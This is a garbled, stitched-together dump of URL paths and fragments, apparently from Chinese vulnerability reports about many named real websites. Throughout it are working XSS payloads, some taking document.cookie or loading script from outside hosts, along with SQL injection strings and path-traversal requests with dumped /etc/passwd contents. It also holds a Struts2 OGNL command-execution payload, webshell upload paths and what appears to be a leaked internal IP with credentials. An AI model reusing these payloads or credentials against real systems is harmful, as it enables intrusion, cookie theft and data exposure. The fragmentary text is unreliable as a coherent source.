Mozilla/5.0 /phpmyadmin /存在IIS源码泄露及文件类型解析错误漏洞,注册用户后上传包含PHP代码的jpg文件,PHP代码成功执行。在图片中插入生成PHP一句话木马的PHP代码,获得shell。通 /的用户信息,导致信息泄露。 /1.txt和http://wiki.acfun.tv/qq.txt,猜测前面已经有别人拿到过网站的shell了。 /点击应用 /tianya_sdk_php/oauth_normal.php /oauth/request_token.php取得request /oauth/authorize.php?oauth_token=XXXX&consumer_key=XXXX&oauth_callback=XXXX /oauth/authorize.php?consumer_key=XXXX /oauth/access_token.php 13.0 /10039/t/z8h1WseDA /js.js' /KinthFrame /KinthFrame /KinthFrame /ca/ /MichelleV6/webMichelle/logonform.jsp /SmtCCS_manage/login.do?action=input /ca/singlelogin.jsp?originUrl=%2Fapp%2Fmain.jsp /app/main.jsp?ticketId=e659954f-46c4-44c9-91b2-5a1539c114e9&s=84603f0b2436 / /DzywApp/login.jsp /ca /inasweb/ /telant /main.jsp /index.do /admin/protected/index.jsp /mbrweb/jsp/member/member_pwd_forgot.jsp /wap/login.shtml /account/v1/api/sendacodenormal /account/app/create?u=https://wallet.baidu.com/active&refer=slogin FG=1 /webmaster/add#1 /system/login.asp /Upload/4/2012120601200453554.asp /index.php?act=user.orderinfo&id=(订单id)&hotelid=(酒店id)&brandID=1&PHPSESSID=*** /c:\windows\system32\BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB /education和 /?center出的年份输入限制过于简单加上%00能绕过 /?business&un=962216200 /static/tz.php /chs/index.html /admin/ / /ued_blog /jsslt/outitemlist.action?topicid=8abc818b1d56bd4c011d57fd24030042 /dzyl/browseBook.action?query.bookType.id=4028811c1b062cae011b062d11b60011 /index_resume.php?page=1&status=-2&board=22 /点击应用 /friendoc/v3.1/ 
/oauth/grant?client_id=c6e5f5a7b7754fcbb9b1f3ae41d290ee&redirect_uri=http%3A%2F%2Fwww.friendoc.net%2Ffriendoc%2Fv3.1%2Floading.php&response_type=code&display=iframe&scope=read_user_status+create_album+read_user_album+photo_upload+read_user_photo+read_user_blog+read_user_feed+read_user_guestbook+read_user_comment+send_request+publish_comment+publish_checkin&state=200&origin=0 /oauth/grant /game/index.php?ka=0 /login/findbackPassword_1.jsp找回密码处 /TIPS /TIPS/guest/GuestSignon.jsp none /xss.js'.replace(/!/g,String.fromCharCode(38)) 14px;font-family:arial,verdana,sans-serif /QYZZ/Template0/index.aspx?JGID=10201 /QYZZ/Template0/index.aspx?JGID=595 /Manage/Login/UserLogin.aspx /Manage/Login/UserLogin.aspx /?action=user_center/orderStatus&todo=index&orderid=2058612 /attack.php /relation.do?action=follow /fuli/search.html?id=0&kw= www.nsw888.com的管理后台 gbk-*- /sub/huodong.html /sub/hd/vote_new.php /game/zhongkouwei/start/cid/566%20and%201=1 /game/zhongkouwei/start/cid/566%20and%201=2 /login_pass.aspx?go=%22%20onmouseover%3dprompt%28947212%29%20bad%3d%22 /index.aspx?UserId=lxj616 /Orders/OrderDetail.aspx?im=fd&oid=166002 /Orders/OrderDetail.aspx?im=zk&oid=166002 /pingji.php?id=6265 /admin /temp_private.php?choice=230 /login.php后台 /install/index /cdairportback/ /my/profile/email /select_lang.action /system.jsp /websitecelebrate /a49632/actimg/12anniversary/js/anniversary.js /SSOServer/SSO/SSOServer_newlogin.action /Article/html/3/62/2012/34272.htm www.53kf.com的网站找到类似于http://www.53kf.com/products/xxxxx.html //index.php?s=/Info/doIndex /1.html /showcommonposts.php?length=31&pagesize=7&fid=7 /showtopclicks.php?pagesize=7 /phpinfo.php /main/ask /10jup/vote/Pl.asp?id=1 /phpmyadmin/index.php /morenews.php?newstype=19 /admin /order/queryByUser.json?callback=x&startDate=2011-01-01&endDate=2012-12-11&status=-1&pageSize=1000¤tPag1 / /WEB-INF/ /index.php?r=site /wp/wp-login/ /wp/wp-admin/.svn/entries /index.php?m=event.modify&eid=5 /SWSJDomestic/DomesticTrade.action 
/space/addusertrr.jhtml?userid=57366852 /space/biuser/login.jsp?currentUrl=%22/%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E;// /complain/index.html /?action=route&id=329846&pdate= /main.php?do=user_do_change_password&old=123456&new=password&pwd_s=1 /main.php?do=user_do_change_password&new=password&pwd_s=1&old="+pass /?action=route&id=329846&pdate= www.your-site.com/1.js function(r) /relationFeedOper.do?action=addHigh&id=000000000 /feedprefs.do /feedprefs.do /relationFeedOper.do?action=addHigh&id=000000000 4}……而是……{code:0 /order/viewproduct/id/56455/ /order/viewproduct/id/56455%20and%201=1/ /order/viewproduct/id/56455%20and%201=2/ /admin/system/uploadfile.php?anyid=14&lang=cn&fileurl=templates得到路径 /templates/x.php /B2C/data/minorenterprises/getQuestionByUserId.xsql?userId=-1中参数userId未过滤实施注入。 /zhaopin/jobFront/jobFront!seeJobHisFront.action?id=1107 /zhaopin/upload/resumeimg/2012/12/a.jsp /php/zhidao1/edit_replyadd/ /product/getAllProductByQuYuBH.action /?umod=commentsoutlet&act=count&siteid=3&libid=9&dataid=1480&score=1&func=haoping&_=1353475261886 /?umod=commentsoutlet&act=count&siteid=3&libid=9&dataid=1480&score= /common/setParentsInfo.php?callback=aaaaaaaaa /common/setParentsInfo.php?callback=aaaaaaaaa /common/setParentsInfo.php?callback=eval('alert(1)');void /search.php?word=乌云欢迎您 /search.php?word=乌云欢迎您 /index.php?c=follow&a=index&appkey=801004516&bg=我是一个兵,爱国爱人民&hsize=80&name=Zhanglifenft,chengyizhong,xiangyang20112007,linchufang,leonardoit,linchufang,qingfengxu6685,zhouzhichen001,yuguoming-ruc,luomingtitan,bjwbgq,kezuozongbianji,weibotalk,lee007,jxzhongweizhi,lihaipengtx 
/index.php?c=follow&a=index&appkey=801004516&bg=;w:expr\65ssion\28%20eval\28\27\69\66\28\21\77\69\6e\64\6f\77\2e\78\29\7b\61\6c\65\72\74\28\64\6f\63\75\6d\65\6e\74\2e\63\6f\6f\6b\69\65\29\3b\77\69\6e\64\6f\77\2e\78\3d\31\7d\27\29\29&hsize=80&name=Zhanglifenft,chengyizhong,xiangyang20112007,linchufang,leonardoit,linchufang,qingfengxu6685,zhouzhichen001,yuguoming-ruc,luomingtitan,bjwbgq,kezuozongbianji,weibotalk,lee007,jxzhongweizhi,lihaipengtx auto;background-color:#我是一个兵,爱国爱人民 /report/search.php?searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaaaaa /report/search.php?offset='+this.value+'&searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaaaaa'"/ /report/search.php?searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaa%26%23x27;%2balert(1)%2b%26%23x27 location='http://stock.finance.qq.com/report/search.php?offset='+document.getElementById('pagenum').value+'&searchtype_yjbg=yjjg&searchvalue_yjbg=aaaaaaaaaa /jmx-console/HtmlAdaptor?action=displayMBeans /cmd/cmd.jsp x:0:0:root:/root:/bin/bash x:1:1:bin:/bin:/sbin/nologin x:2:2:daemon:/sbin:/sbin/nologin x:3:4:adm:/var/adm:/sbin/nologin x:4:7:lp:/var/spool/lpd:/sbin/nologin x:5:0:sync:/sbin:/bin/sync x:6:0:shutdown:/sbin:/sbin/shutdown x:7:0:halt:/sbin:/sbin/halt x:8:12:mail:/var/spool/mail:/sbin/nologin x:9:13:news:/etc/news x:10:14:uucp:/var/spool/uucp:/sbin/nologin x:11:0:operator:/root:/sbin/nologin x:12:100:games:/usr/games:/sbin/nologin x:13:30:gopher:/var/gopher:/sbin/nologin x:14:50:FTP /var/ftp:/sbin/nologin x:99:99:Nobody:/:/sbin/nologin x:28:28:NSCD /:/sbin/nologin x:69:69:virtual /dev:/sbin/nologin x:94:94:Distcache:/:/sbin/nologin x:16:16:Special /home/oprofile:/sbin/nologin x:77:77::/var/arpwatch:/sbin/nologin x:48:48:Apache:/var/www:/sbin/nologin x:32:32:Portmapper /:/sbin/nologin x:47:47::/var/spool/mqueue:/sbin/nologin x:51:51::/var/spool/mqueue:/sbin/nologin x:38:38::/etc/ntp:/sbin/nologin x:67:67:Webalizer:/var/www/usage:/sbin/nologin x:100:101:OpenVPN:/etc/openvpn:/sbin/nologin x:23:23::/var/spool/squid:/sbin/nologin 
x:29:29:RPC /var/lib/nfs:/sbin/nologin x:4294967294:4294967294:Anonymous /var/lib/nfs:/sbin/nologin x:74:74:Privilege-separated /var/empty/sshd:/sbin/nologin x:81:81:System /:/sbin/nologin x:70:70:Avahi /:/sbin/nologin x:68:68:HAL /:/sbin/nologin x:43:43:X /etc/X11/fs:/sbin/nologin x:101:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin x:102:106:ntop:/var/lib/ntop:/sbin/nologin x:42:42::/var/gdm:/sbin/nologin x:86:86:Sabayon /home/sabayon:/sbin/nologin /cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%22;alert(1);//aaaaaa /cgi-bin/qm_help_mailme?sid=,2,zh_CN&t=%c0%22;alert(1);//aaaaaa /bookfriend/home?wc=201212133 / /admin/ /yiliao/item.php?id=695 /chanel.php?id=14 / / / / www.dalibao.cn www.960961.cn www.960961.net www.960961.com www.960961.cn www.960961.net www.ocar.com.cn www.jslegal.com /cgi-bin/login?vt=passport&ss=aaa&from=bbb&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1 /cgi-bin/login?vt=passport&ss=\&from==0;alert(1);function/**/from(){};//&delegate_url=%2Fcgi-bin%2Fframe_html%3Furl%3D%25252Fcgi-bin%25252Fsetting10%25253Faction%25253Dlist%252526t%25253Dsetting10%252526ss%25253Dindex%252526Mtype%25253D1%252526clickpos%25253D20%252526loc%25253Ddelegate%25252Cwebmap%25252C%25252C1 /cgi-bin/mifiAjaxDeviceInfoGet.cgi /cgi-bin/mifiAjaxWizardGet.cgi /phpinfo.php /cgi-bin/search?libid=178&FilterAttrAND=3602&FilterValueAND=aaaaaaaaaa /cgi-bin/search?libid=178&FilterAttrAND=3602&FilterValueAND=%0aalert(1);// /855003310/?PTAG=33410.6.61 / /downloadPatch.do?pathName=../WEB-INF/web.xml /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/../../../../../data/ /skypearl/cn/toExchangeStandard.action /web/productAction!queryProduct.action?prodId=10077 
/index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=aaaaaaaaaaaa /index.php?mod=search&type=data&site=digi&libid=2&curpage=1&pagenum=30&filterattr=138,138|16|4,5,4,5&filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&tplname=centersearch.shtml&orderby=aaaa%c0%5c%0aalert(1);// /emall/SNFlagShopSearch?storeId=10052&catalogId=10051&brandStroeGroupId=9067010209&shopCode=pioneer'INJECTED_PARAM /hoteltuan-web/index.htm?cityId=11'INJECTED_PARAM /Happigo.zip /reg.jsp /interface/album/album.php?ie=utf-8&op=0&type=1&name=%22%3E%3Cscript%3Ealert&rd=0.7457662494386118 /app/enter?appid=280383 /cgi-bin/search?libid=1&keyvalue=aaaaaaa&attr=133&stype=2&tname=star_second.shtml /cgi-bin/search?libid=1&keyvalue=\u003Cimg\u0020src=1\u0020onerror=alert(1)\u003e&attr=133&stype=2&tname=star_second.shtml /cgi-bin/search?libid=1&keyvalue=\x3Cimg\u0020src=1\u0020onerror=alert(1)\x3e&attr=133&stype=2&tname=star_second.shtml /user_index.php?action=creategroup /groupadmin.php?action=diyclassart&gid=3643&classid=3115 url(#default#AnchorClick) alert(1) alert(1)// expre\ssion(alert(1)) //frontend/holiday/holiday-auto!list.action /api/signApp.jsp /getUserRealAuthInfoByMe.action /newsn /zlxyAct!chushihua.action /fedemember/fedeMemberView.action?id=1319 /profile/contactInfo www.xxxxx.com网站存在XSS漏洞,点联系网站 /newsn /commonInter!taskInfo.action?jsoncallback=?&_dc=然后替换mac和id就可以了 /receiveScore.action?jsoncallback=jsonp1355490185120&category=0&type=0&mac={mac}&userID={id}&_dc=1355490149387&_=1355490149387 /com/js/manager.js /share/link?shareid=131326&uk=220764288 /iphone5/order.action /create-share/index.php?upd_id=xxx /i/MobileWap/login /m/login /upload/index.php/upload/user/apply /upload/uploads/1355631395_yijuhua.php / / /webcenter/xzspWebActionSubItemList.action?classValueId=4125&subName= / 
/abcProList!abcProDisplay.action?productId=32550&brandId=&expertId=411 //manage/jsp/user/login.jsp /frontend/groupbuying/order/grouporder!doQueryDetail.action?condition.id=$id /gywm/newsInfo!select.do /web/web/lanmu/lanmushow.asp?lei=%B9%E6%D5%C2%D6%C6%B6%C8 /index_nc?r[]=cookielist&e[]=mini_panel&s=mini&cb=any /2.html?name=shouzi&age=20 /2.html?name= /video/play_video.htm?sid=aaaaaa d27cdb6e-ae6d-11cf-96b8-444553540000 /pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0 /video/play_video.htm?sid=aaaaaa /video/play_video.htm?sid=aaaaaa /go/getflashplayer location.reload() /go/getflashplayer location.reload() d27cdb6e-ae6d-11cf-96b8-444553540000 /pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0 /go/getflashplayer /video/play_video.htm?sid=aaaaaa%22%3E%3C/object%3E%3Cimg%20src=1%20onerror=alert(1)%3E /video/play_video.htm?sid=aaaaaa /video/play_video.htm?sid=aaaaaa%22%3E%3C/object%3E%3Cimg%20src=1%20onerror=alert(1)%3E /logo/userlevel1_new.jpg /logo/user_new.jpg /logo/userlevel1_new.jpg /logo/user_new.jpg /phoneshop/ydkt/ /phoneshop/anquanqijisuanqi.shtml /fk/uploads/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@ /fk/uploads/dede /fk/uploads/data/enums/love.php 192.168.0.221 lp120 rgFv44b61kax lp120 www.xywy.com/zzk/zzkapp/sql/zzkclass.sql www.xywy.com/zzk/zzkapp/sql/zzkinfo.sql www.xywy.com/zzk/zzkapp/sql/buwei.sql none /qq/j.php?path=http://test.com/qq/&r='+Math.random() schemas-microsoft-com:vml url(#default#vml);position:absolute;width:90%;height:200% /qq/qq.vml#qq 100%;width:100% url(#default#vml),利用得先发一封邮件,等用户回复之后,再发送跨站邮件即可跨站成功! 
none /'+'/test.com/js.js?'+Math.random() /get_password.html /gxmh/ /gxmh/MdyRegInfo.aspx?uid=2059 /gxmh/MdyRegInfo.aspx?uid=2060 /gxmh/MdyRegInfo.aspx?uid=1 www.fjdpc.gov.cn /gxmh/home.aspx /sxtag/index.action /index.php?mod=members&do=detail&id=55 /index.php?mod=members&do=detail&id=55%20anD%201%3D1 /index.php?mod=members&do=detail&id=55%20anD%201%3D11 /web-console/ /web-console/ /web-console/ /jsp/system/ /search_app.shtml?key=aaaaa /search_app.shtml?key;alert(1);//=aaaa /search_app.shtml?key=aaa";alert(1);// /cheguansuo/homePage.action /www.114mall.com.cn.rar /public/detail.php?id=54536 221.122.40.14----- / / / / / / / / / / / / / / / / / alert(1) msgbox(1) text/html text/html,<script>alert(1)</script> /appweb/tools/tool-detail.shtml?turl=aaaaaa&gid=yl&cid=68&from= /appweb/tools/tool-detail.shtml?turl=javascript:alert(1);&gid=yl&cid=68&from= /appweb/tools/tool-detail.shtml?turl=vbscript:msgbox(1)'&gid=yl&cid=68&from= /appweb/tools/tool-detail.shtml?turl=data:text/html /index.php /ajax/json/pushfeed/pushfeed /tj8ke /searchResult.html?searchstr=%E2%80%9D%3Cscript%20src=%22http://xsscn.sinaapp.com/?u=8349dd%22%20%3E%20%3C/script%3E%3C!-- /126.am/Zj84p4 /Zj84p4 /comm_json?callback=commentListCallBack&dtag=1&ac=1&cluster=1&sellquality=0&NewProp=&Property=256&PageNum=1&PageSize=48&OrderStyle=80&Address=&SaleType=1°ree=1&AuthType=2&BeginPrice=&EndPrice=&KeyWord=2012%20%D0%C2&OnlineState=2&Paytype=4&ranking=&sClassid='aaaaaaaa&t=1354854681 /comm_json?callback=alert(1) /search_list.shtml?type=&callback=alert(1);&np=11&pro=256&searchtype=2&cs=0010000&keyword=&PTAG=20058.13.13 /search_list.shtml?type=%26callback=alert(1);&np=11&pro=256&searchtype=2&cs=0010000&keyword=&PTAG=20058.13.13 /js/search.js?t=20121108 /search_list.shtml?type=213280&np=11&pro=256&searchtype=2&cs=0010000&keyword=%26callback=eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41));void&PTAG=20058.13.13 /newsread.php?newid=483 /help_detail.aspx?id=43 
/?id=1 /?id=1 /?id=1 /?id=1 /?id=1 /?id=(1)and'r'= /?id=1 /?id=(1)union www.wtf.tk/Pages/Index.aspx?id=1+and+1=1 www.wtf.tk/test/..\Pages/Index.aspx?id=1+and+1=1 /elibregister/commonRegister.aspx /upload/snsinfo/20121219161451_9091.jpg/x.php /chaxun.html /chaxun.php?cardNumber=+861454009xxxx(上网卡号码) /hskxread.php?id=1638 / /ward/main.jsp /wbep/ / / /Config.inc /user!login.action /user!login.action /t35/apps/opent/js/widget/share_btn_iframe.js /A1/weiboshare.html?url=&count=3 /)存在SQL输入库文件下载 /data.sql /webmail/optionForward.do /file/zwzwdel-File.shtml?para.qualifications_id="+annex_code.value+"&para.company_code="+company_code.value /slpgadmin/index.php?s=/Learn/c_category_edit/id/499/ /slpgadmin/index.php?s=/Learn/ /index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D /activity/201205_fab/index.php?action=news_detail&id=107710 /campaign.php?id=494 /uploadServer/jsp/debug.jsp /avatar/index/interact?origin=***&from=*** /user/eems/index.htm /user/EnergyInsight/index.htm /ad.php?id=18 / /1686789955 /dc/uninstall.php?000001 /wwwroot.rar / /reg_success/?m=XXX@sina.com&r=1 /cbscms/admin/login!login.do / www..com /FCKeditor/editor/filemanager/browser/default/connectors/test.html /miniportal/static/taoge_v2/album/59/ucc_album_21898659.html?tn=%3Cimg/onerror=alert(document.cookie)%20src=1%3Epkavoverx&ptid=1&tid=27 /awaP /payState.aspx?payID=2012122051180386 /index.php?hostID=1 /topic.php?channelID=9&topicID=40 /topic.php?topicID=40&channelID=9 /ppweb/zhaotb/qualapprfile/qualapprfileFrame.jsp?qualapprfile=1179811000000000A34E /)采用的存在SQL注入漏洞的老ShopEx /shopadmin/index.php?ctl=passport&act=login。就不登录后台了,点到为止。 /connect.php?receive=yes&mod=login&op=callback&referer=aaaaaaaaaaa&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802 /./aaaaaaaaaaa /./a' /./a\u0027 
/connect.php?receive=yes&mod=login&op=callback&referer=a\u0027;alert(document.cookie);a=\u0027&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802 alert(document.cookie) /./a'.replace(/.+/,/javascript:alert(document.cookie)/.source);// /./a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);// /connect.php?receive=yes&mod=login&op=callback&referer=a\u0027.replace(/.\u002b/,/javascript:alert(document.cookie)/.source);//&oauth_token=17993859178940955951&openid=A9446B35E3A17FD1ECBB3D8D42FC126B&oauth_signature=a6DLYVhIXQJeXiXkf7nVdbgntm4%3D&oauth_vericode=3738504772×tamp=1354305802 / /web2/login_template/9.html /opt/webimlive.action /去里面买吃的看见有个监督投诉就试了下盲打 / / /user/user/set /404-2.gif /distribution/comments.php?width=1000&url=test',%20 / /Products/index/id/4%20and%201=2%20union%20select%201,2,3,4,user%28%29-- /console/ /careertest/usercreate.php?id=4456785 /php/report/archive/global_addressbook.php?uid=&domain=wanda.com.cn&skin=current /showjoblist.php?divid=4087934 /useradmin/SMSDetail.aspx?ID=1901,如下图所示: /useradmin/LinkArticleShow.aspx?id=8进行常规and /AutoRedirect.aspx?source=123&url=http://www.baidu.cn?zhongmin.cn /activeQQ/activate/image.jsp?qq=314487651&extend=http%3A%2F%2Fvc.gtimg.com%2FO1D59WST5GMZYDKBSJ7GS34Z1EYY11PF&r_sid=O1D59WST5GMZYDKBSJ7GS34Z1EYY11PF&imgType=gif%22%3E%3Cimg%20src='x'%20onerror='alert(1);'/%3E&i_p_w=imgType%7C /view/yanduan.php?type=36 /webalizer/ /webalizer/usage_201209.html /hi365/himanager/ qq.com swf qq.com swf xml /liveportal_v1/swf/carousel.swf?v=20101111&dp=http://v.qq.com/doco/pic.xml /doco/pic.xml这个XML文件的数据,为了看看是什么数据,我们可以使用抓包软件【这里我使用的是charles /doco/pic.xml的内容,对应着FLASH来看。 alert(1) alert(1) /doco/pic.xml /liveportal_v1/swf/carousel.swf /pic.xml /category-yigui/mcat0-scat0-b0-max0-min0-attr-page-1-sort-sort_order-order-asc.html?keywords=%22%3E%3Cscript%3Ealert%282%29%3C/script%3E 
/lishui/goods.html?act=goods®ion_id=134&eid=109 /search.html?keywords=a /css/myquery/queryWQSBill.action String=root.loaderInfo.parameters.func /xxx.swf?func=newalert /xxx.swf?func= /swf/swfupload.swf /swf/swfupload.swf?movieName=aaaaaaaa /swf/swfupload.swf?movieName=aaa /sheport//pub/rigister/showServiceArticle.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ls\40\u002dl\40../webapps\'')(d))&(h) /UserSetting.php?r=b / /default5.aspx访问,发现只需要用户名和密码就能进行登录认证了,此处可用brute /bm_main.aspx?xh=jwc /index.php?mod=search&type=data&site=digi&libid=2&curpage=1&filterattr=115%7C138,138&filtervalue=a%A3%A8%C6%BB%B9%FB%A3%A9%7C3000-3500,3500-4000&orderby=F13%20desc&pagenum=30&tplname=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd x:25:25:Batch /var/spool/atjobs:/bin/bash x:1:1:bin:/bin:/bin/bash x:2:2:Daemon:/sbin:/bin/bash x:40:49:FTP /ftp:/bin/bash x:12:100:Games /var/games:/bin/bash x:101:102:User /var/run/hal:/bin/false x:4:7:Printing /var/spool/lpd:/bin/bash x:8:12:Mailer /var/spool/clientmqueue:/bin/false x:100:101:User /var/run/dbus:/bin/false x:65534:65533:nobody:/var/lib/nobody:/bin/bash x:74:103:NTP /var/lib/ntp:/bin/false x:51:51:Postfix /var/spool/postfix:/bin/false x:26:26:PostgreSQL /var/lib/pgsql:/bin/bash x:0:0:root:/root:/bin/bash x:71:65:SSH /var/lib/sshd:/bin/false x:102:104:Novell /var/lib/YaST2/suse-ncc-fakehome:/bin/bash x:30:8:WWW /var/lib/wwwrun:/bin/false x:30:8:WWW /bin/false x:13:62:Manual /var/cache/man:/bin/bash x:9:13:News /etc/news:/bin/bash x:10:14:Unix-to-Unix /etc/uucp:/bin/bash x:1000:100::/home/webdev:/bin/bash dev_samhe:x:1001:100::/data/dev_samhe:/bin/bash x:1002:100::/data/webroot:/bin/bash /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml 
/resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /resin-doc/viewfile/?contextpath=/&servletpath=&file=fakefile.xml /docs.jsp?flag=http://madman.in /shouji/?prod=--%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,alert(1)%3E%3C/script%3E /.svn/entries /a/CVS/Root /CVS/Root /server-status /tools/phpinfo.php /info.php /login.aspx /login.asp /download/zt.php?tid=390&rid=406 /zt.php?tid=390 /2012/amie/index.php?aid=145725 /space.php?uid=16971&t=6 /zj/admin'%20and%20'a'='a /zj/admin'%20and%20'a'='b /search.php?search_key=%D3%A6%D3%C3%C9%CC%B5%EA%27 551dde4834fd237b:localhost 730aa64a06767383:localhost pintui_localhost:6e1b14bb4d2d70c7:% /XXXXXX /main.action /login.aspx /index_admin.asp?uid=admin /User/huiyuan_add.aspx /User/huiyuan.aspx /zhuanti/more.php?cid=2884 /zhuanti/more.php?cid=2884 /seeyon/index.jsp /login.aspx /a/?aid=150630 /?type=2193 /zt.php?tid=933&rid=956 /space.php?uid=16971'&p=1&t=1 /space.php?uid=16971&p=1&t=1 /b/?aid=5725 /pl/?aid=150630 /more/index.php?cid=2692'&p=1 /php/_article_right.php?cid=2189 /zhuanti/2012nmac/all.php?search=88952634 /edm_sub_1.php /expert/login/LoginSubmit.do /expert/login/Remix.do /2012/amie/index.php?aid=145725 /2012/amie/index.php?aid=145725 551dde4834fd237b:localhost 730aa64a06767383:localhost pintui_localhost:6e1b14bb4d2d70c7:% qq.com swf xml /qzone_v4/2/default_menu_horizontal.swf?xml_path=http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml /qzone/client/custom_menu/custom_menu.xml里是个什么内容。 /qzone/client/custom_menu/custom_menu.xml。 /qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml /qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml /login.php /?src=DHN-kz-mid04 /item.htm?id=16080191711 /search?lm=0&rn=10&pn=0&fr=search&ie=gbk&word=%3CSCRIPT+Language%3D&f=sug www.shodanhq.com 
/member/baoming.php?eventid=6%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,version%28%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 /s361935980.html,对文章进行评论时,选择“PK辩论”,在添加辩论话题时存在XSS漏洞。 / /qzone/v6/custom/custom_module_proxy.html#siDomain=1&g_StyleID=aaaaaaaaaa /qzone_v6/gb/skin/'+g_StyleID+'.css /qzone_v6/home_normal.css /qzone/v6/custom/custom_module_proxy.html#siDomain=1&g_StyleID= /qzone/v6/custom/custom_module_proxy.html#siDomain=1&g_StyleID= /blog/ /php/login?game=roco&uin= /tcss.ping.js /php/login?game=roco&uin= /?p=4&type=2832%22%20onmouseover%3dprompt(988413)%20bad%3d%22 /?type=2757'%20onmouseover%3dprompt(960738)%20bad%3d /getpassword.aspx /wap/scenery/OrderDetail_T13010109930.html?auth=pjrG_lL4sHFHJsvnLTdvuQ2&refid=2480279 /BofSLj /CWISEj / /news.php?id=124 /cli.cgi?cmd=echo%20账号:%;$poe_user%;echo%20密码:%;$poe_pass% /html.php?id=565%20and%201=1 /html.php?id=565%20and%201=2 /user.php?uid=xxx /search/ajax/search_result/ /question/395 /uploads/questions/20120607/bd0aacaa686c1249d965c6cec9d10cf5.zip /wenda/system/unset.php?a=1&b=2 /wenda/system/unset.php?GLOBALS[a]=1&b=2 /content/1872 /bjxf_public/toRecheckQueryPortal.action / schemas-microsoft-com:vml url(#default#vml);position:absolute;width:100%;height:100% /shouzi.vml#xss /app/papers /ft/question.fb?pid=3&cid=33518893&type=0&pno=%22%3E%3Ciframe%20src=%22javascript:alert%28document.cookie%29;%22%3E /interface/mail?m=set_send&mail=***********@qq.com&jsoncallback=jsonp1356855966584 /AirChargeWeb/login!login.action d27cdb6e-ae6d-11cf-96b8-444553540000 /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf d27cdb6e-ae6d-11cf-96b8-444553540000 /vphoto.swf /vphoto.swf d27cdb6e-ae6d-11cf-96b8-444553540000 d27cdb6e-ae6d-11cf-96b8-444553540000 /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf d27cdb6e-ae6d-11cf-96b8-444553540000 /qzone/client/photo/swf/vphoto.swf /qzone/client/photo/swf/vphoto.swf 
